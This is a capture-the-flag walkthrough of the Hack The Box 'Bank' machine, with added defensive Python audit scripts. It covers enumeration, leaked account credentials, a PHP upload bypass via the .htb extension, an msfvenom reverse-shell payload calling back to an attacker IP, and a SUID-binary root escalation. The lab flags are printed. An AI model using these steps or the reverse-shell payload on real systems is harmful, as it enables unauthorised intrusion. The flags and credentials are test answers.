Service overview

The machine's IP address is 10.10.10.29. Standard nmap output:

$ nmap -sC -sT -Pn -vvv -oN 10.10.10.29 10.10.10.29 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-26 13:32 EDT
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:32
Completed Parallel DNS resolution of 1 host. at 13:32, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:32
Scanning 10.10.10.29 [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Increasing send delay for 10.10.10.29 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.29 from 5 to 10 due to 11 out of 33 dropped probes since last increase.
Completed Connect Scan at 13:32, 22.51s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.29.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:33, 20.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Nmap scan report for 10.10.10.29
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-26 13:32:25 EDT for 42s
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss 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
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
|   256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open  domain  syn-ack
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    syn-ack
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 43.05 seconds

Web interface

The site root serves the default Apache2 page.

DNS is listening on port 53, so its records are worth checking.

$ dig bank.htb @10.10.10.29

; <<>> DiG 9.18.16-1-Debian <<>> bank.htb @10.10.10.29
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<opcode: QUERY, status: NOERROR, id: 44574
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;bank.htb.                      IN      A

;; ANSWER SECTION:
bank.htb.               604800  IN      A       10.10.10.29

;; AUTHORITY SECTION:
bank.htb.               604800  IN      NS      ns.bank.htb.

;; ADDITIONAL SECTION:
ns.bank.htb.            604800  IN      A       10.10.10.29

;; Query time: 56 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (UDP)
;; WHEN: Wed Jul 26 14:02:31 EDT 2023
;; MSG SIZE  rcvd: 86

Add the discovered records to /etc/hosts:

$ sudo nano /etc/hosts
10.10.10.29 bank.htb ns.bank.htb

Let's look for other directories and for files with the php extension:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://bank.htb -t 20 -x php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/07/26 14:07:00 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 302) [Size: 7322] [--> login.php]
/login.php            (Status: 200) [Size: 1974]
/support.php          (Status: 302) [Size: 3291] [--> login.php]
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer     (Status: 301) [Size: 304] [--> http://bank.htb/balance-transfer/]
Progress: 22035 / 175330 (12.57%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/07/26 14:08:28 Finished
===============================================================

The directory /inc/ is interesting because of the files it contains.

The /balance-transfer/ directory contains *.acc files.

Each file looks like a transaction log with encrypted contents.

Let's download the whole directory to examine it more closely.

wget -r http://bank.htb/balance-transfer/

The directory holds files of several sizes, most of them 581-585 bytes. Among them is a single file of 257 bytes:

$ ls -la | grep acc | awk -F " " '{print $5}' | sort | uniq
257
581
582
583
584
585
$ ls -la | grep 257                                        
-rw-r--r-- 1 user user    583 Jun 15  2017 29ee355c82a4bbe25787fc0b4d96dd45.acc
-rw-r--r-- 1 user user    585 Jun 15  2017 3e15fba8222b4257f517f73ffa6e8dbf.acc
-rw-r--r-- 1 user user    585 Jun 15  2017 500f59a56cf27362df6df66852574348.acc
-rw-r--r-- 1 user user    584 Jun 15  2017 5be5196a9bfbf55be5322576b6cf2ec0.acc
-rw-r--r-- 1 user user    257 Jun 15  2017 68576f20e9732f1b2edc4df5b8533230.acc
-rw-r--r-- 1 user user    584 Jun 15  2017 92579940417f9ae8d23f3274830ceeaa.acc
-rw-r--r-- 1 user user    584 Jun 15  2017 cbeed458cd121a5a971a2578ff6a3a95.acc
-rw-r--r-- 1 user user    584 Jun 15  2017 e1c22573a63c4b2a458b50fe5952dfbe.acc
-rw-r--r-- 1 user user    584 Jun 15  2017 e291abebd339260825783fb4c3a308ad.acc

Let's look inside that file:

$ cat 68576f20e9732f1b2edc4df5b8533230.acc 
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
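
The single short file is the one whose encryption failed, and it exposes an account record in clear text. As an added defender-side example (not code from the original writeup), the following scanner walks a directory of such report files, flags sizes that fall outside the cluster, and classifies each file as opaque, encrypt-failed, or plaintext-credentials. The sample directory it builds is constructed to mirror the listing above; the markers `--ERR ENCRYPT FAILED` and the field names come from the leaked report on this page, while the filler layout of the "normal" reports and the placeholder credential values are assumptions.

```python
import os
import statistics
import tempfile

# Markers taken from the leaked report shown on this page. The layout of the
# "normal" encrypted reports built below is a constructed assumption.
ERROR_MARKER = b"--ERR ENCRYPT FAILED"
CREDENTIAL_FIELDS = (b"Email:", b"Password:", b"CreditCards:")


def size_outliers(sizes, tolerance=3):
    """Sizes more than `tolerance` bytes away from the median. On this box the
    encrypted reports clustered at 581-585 bytes; the plaintext one was 257."""
    if not sizes:
        return set()
    median = statistics.median(sizes)
    return {s for s in sizes if abs(s - median) > tolerance}


def classify_report(data):
    """'plaintext-credentials' if account fields are readable, 'encrypt-failed'
    if only the error banner is present, otherwise 'opaque'."""
    if all(field in data for field in CREDENTIAL_FIELDS):
        return "plaintext-credentials"
    if data.startswith(ERROR_MARKER):
        return "encrypt-failed"
    return "opaque"


def scan_directory(path, ext=".acc"):
    """Map each report file to (size, classification, is_size_outlier)."""
    entries = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith(ext):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            data = fh.read()
        entries[name] = (len(data), classify_report(data))
    outliers = size_outliers([size for size, _ in entries.values()])
    return {name: (size, cls, size in outliers) for name, (size, cls) in entries.items()}


def findings(report):
    """Files a defender should pull from the web root: readable content or odd size."""
    return sorted(name for name, (_, cls, odd) in report.items() if cls != "opaque" or odd)


def build_sample_dir():
    """Constructed sample directory mirroring the listing on this page: eight
    opaque reports of 583-585 bytes and one failed-encryption report.
    The credential values are placeholders, not the box's data."""
    directory = tempfile.mkdtemp()
    filler = b"U2FsdGVkX19oZWxsb3dvcmxk" * 30  # base64-looking bytes, no readable fields
    for i, size in enumerate([583, 585, 585, 584, 584, 584, 584, 584]):
        with open(os.path.join(directory, f"report{i:02d}.acc"), "wb") as fh:
            fh.write(filler[:size])
    leaked = (
        ERROR_MARKER + b"\n+=================+\n| HTB Bank Report |\n+=================+\n\n"
        b"===UserAccount===\nFull Name: Example User\nEmail: user@example.com\n"
        b"Password: placeholder-not-a-real-password\nCreditCards: 0\n"
        b"Transactions: 0\nBalance: 0 .\n===UserAccount===\n"
    )
    with open(os.path.join(directory, "leak.acc"), "wb") as fh:
        fh.write(leaked)
    return directory


if __name__ == "__main__":
    sample = build_sample_dir()
    report = scan_directory(sample)
    for name, (size, cls, odd) in report.items():
        print(f"{name:14} {size:4d} bytes  {cls:22} {'SIZE OUTLIER' if odd else ''}")
    print("review:", findings(report))
```

The size check catches the file even when the content marker is unknown, and the content check catches a plaintext record even when its size happens to match the others, so a web-root audit should run both.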

Use the credentials [email protected]:!##HTBB4nkP4ssw0rd!## to log in to the web application.

On the /support.php route you can open a support ticket and attach a file. Unfortunately, simply attaching a PHP shell does not get past the checks.

A note left in the code says that files with the htb extension are executed as PHP.
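
The root cause is a web-server mapping that hands a second extension to the PHP interpreter while the upload directory still allows script execution. As an added example (not code from the writeup or from the box), the following audit parses an Apache vhost for AddType/AddHandler lines that route extra extensions to PHP and checks whether the uploads directory has the PHP engine switched off. Both configs are constructed: the weak one assumes the box used `AddType application/x-httpd-php .php .htb` (the page only mentions a note in the code), and the hardened one uses the mod_php directive `php_admin_flag engine off`.

```python
import re

# Constructed configs. Assumption: the box mapped .htb to PHP with an AddType
# line in the vhost; the page only says a note in the code describes the behaviour.
WEAK_CONFIG = """\
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    AddType application/x-httpd-php .php .htb
</VirtualHost>
"""

# Hardened: only .php is handed to PHP, and the upload directory gets no
# script execution at all (php_admin_flag is a mod_php directive).
HARDENED_CONFIG = """\
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    AddType application/x-httpd-php .php
    <Directory /var/www/bank/uploads>
        php_admin_flag engine off
        RemoveType .php
        Options -ExecCGI
    </Directory>
</VirtualHost>
"""

DIRECTIVE_RE = re.compile(r"^[ \t]*(AddType|AddHandler)[ \t]+(\S+)[ \t]+(.+?)[ \t]*$", re.I | re.M)
DIR_BLOCK_RE = re.compile(r"<Directory\s+([^>]+)>(.*?)</Directory>", re.I | re.S)
ENGINE_OFF_RE = re.compile(r"php_admin_flag\s+engine\s+off", re.I)
ALLOWED_PHP_EXTENSIONS = {".php"}


def php_extension_map(config):
    """Extension -> directive for every AddType/AddHandler that routes to PHP."""
    mapping = {}
    for directive, target, extensions in DIRECTIVE_RE.findall(config):
        if "php" not in target.lower():
            continue
        for ext in extensions.split():
            mapping[ext.lower()] = f"{directive} {target}"
    return mapping


def nonstandard_php_extensions(config):
    """Extensions executed as PHP other than the expected .php."""
    return sorted(ext for ext in php_extension_map(config) if ext not in ALLOWED_PHP_EXTENSIONS)


def audit(config, upload_hint="upload"):
    """Return human-readable problems; an empty list means the checks passed."""
    problems = [f"extension {ext} is executed as PHP" for ext in nonstandard_php_extensions(config)]
    upload_blocks = {path.strip(): body for path, body in DIR_BLOCK_RE.findall(config)
                     if upload_hint in path.lower()}
    if not upload_blocks:
        problems.append("no <Directory> block restricts the uploads directory")
    for path, body in upload_blocks.items():
        if not ENGINE_OFF_RE.search(body):
            problems.append(f"PHP engine still enabled under {path}")
    return problems


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg) or "OK")
```

The extension check alone is not enough: even with only `.php` mapped, a writable directory that still executes scripts remains a risk, which is why the audit also demands an explicit engine-off block for the upload path.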

$ msfvenom -p php/reverse_php LHOST=10.10.16.93 LPORT=4242 -f raw > shell.htb
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2981 bytes
$ msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4242
lport => 4242
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.93:4242

The upload succeeded.

curl http://bank.htb/uploads/shell.htb

User flag

We have enough privileges to grab the flag from /home/chris.

cd /home
ls -la
total 12
drwxr-xr-x  3 root  root  4096 Jan 11  2021 .
drwxr-xr-x 22 root  root  4096 Jan 11  2021 ..
drwxr-xr-x  3 chris chris 4096 Jan 11  2021 chris
cd chris
ls -la
total 28
drwxr-xr-x 3 chris chris 4096 Jan 11  2021 .
drwxr-xr-x 3 root  root  4096 Jan 11  2021 ..
lrwxrwxrwx 1 root  root     9 Jan 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 chris chris  220 May 28  2017 .bash_logout
-rw-r--r-- 1 chris chris 3637 May 28  2017 .bashrc
drwx------ 2 chris chris 4096 Jan 11  2021 .cache
-rw-r--r-- 1 chris chris  675 May 28  2017 .profile
-r--r--r-- 1 chris chris   33 Jul 26 19:27 user.txt
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat user.txt
1089a56e67effacd223a5b6e127c8750

Privilege escalation

While looking around the machine, we found the file /var/htb/bin/emergency with the SUID bit set.

Simply running this binary gives us a root shell.

/var/htb/bin/emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root)(www-data)
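
A root-owned setuid binary outside the usual system directories is exactly what a baseline comparison is meant to surface. As an added example (not from the writeup), the following script parses the output of `find / -perm -4000 -type f -printf '%m %u %p\n'`, compares it against a known-good baseline, and reports setuid files that are either absent from the baseline or located outside standard binary directories; `collect_suid` is a live equivalent of that find command for hosts where you can run Python. The sample output and the baseline set are constructed; /var/htb/bin/emergency is the path named on this page.

```python
import os
import stat

# Constructed sample output of
#   find / -perm -4000 -type f -printf '%m %u %p\n'
# /var/htb/bin/emergency is the path named on this page; the other entries are
# ordinary Ubuntu setuid binaries and stand in for a known-good baseline.
SAMPLE_FIND_OUTPUT = """\
4755 root /bin/su
4755 root /bin/ping
4755 root /usr/bin/passwd
4755 root /usr/bin/sudo
4755 root /var/htb/bin/emergency
"""

# Assumed baseline captured from a clean build of the same image.
BASELINE = {"/bin/su", "/bin/ping", "/usr/bin/passwd", "/usr/bin/sudo"}
STANDARD_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def parse_find_output(text):
    """[(mode, owner, path)] from the printf format above; paths may contain spaces."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            mode, owner, path = line.strip().split(" ", 2)
            rows.append((mode, owner, path))
    return rows


def suid_findings(text, baseline=BASELINE):
    """Setuid files that are not in the baseline or sit outside the usual
    system binary directories, together with the reasons."""
    results = []
    for mode, owner, path in parse_find_output(text):
        if not int(mode, 8) & stat.S_ISUID:
            continue
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(STANDARD_PREFIXES):
            reasons.append("outside standard binary directories")
        if reasons:
            results.append((path, owner, "; ".join(reasons)))
    return results


def collect_suid(root="/"):
    """Live equivalent of the find command: walk `root` and return setuid
    regular files in the same 'mode owner path' text format."""
    import pwd  # Unix only
    lines = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                try:
                    owner = pwd.getpwuid(st.st_uid).pw_name
                except KeyError:
                    owner = str(st.st_uid)
                lines.append(f"{stat.S_IMODE(st.st_mode):o} {owner} {full}")
    return "\n".join(lines)


if __name__ == "__main__":
    for path, owner, why in suid_findings(SAMPLE_FIND_OUTPUT):
        print(f"{path} (owner {owner}): {why}")
```

Running `suid_findings(collect_suid())` on a host with a baseline taken from its golden image turns the manual "look around for SUID files" step into a repeatable check; the location heuristic catches new binaries even before a baseline exists.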

Root flag

cd /root
ls -la
total 36
drwx------  4 root root 4096 Jan 11  2021 .
drwxr-xr-x 22 root root 4096 Jan 11  2021 ..
lrwxrwxrwx  1 root root    9 Jan 11  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3110 May 30  2017 .bashrc
drwx------  2 root root 4096 Jan 11  2021 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwxr-xr-x  2 root root 4096 Jan 11  2021 .rpmdb
-rw-r--r--  1 root root   66 May 29  2017 .selected_editor
-rw-------  1 root root  598 Jan 11  2021 .viminfo
-r--------  1 root root   33 Jul 26 19:27 root.txt
cat root.txt
296c5d5deda26ea30c10983b68144d7a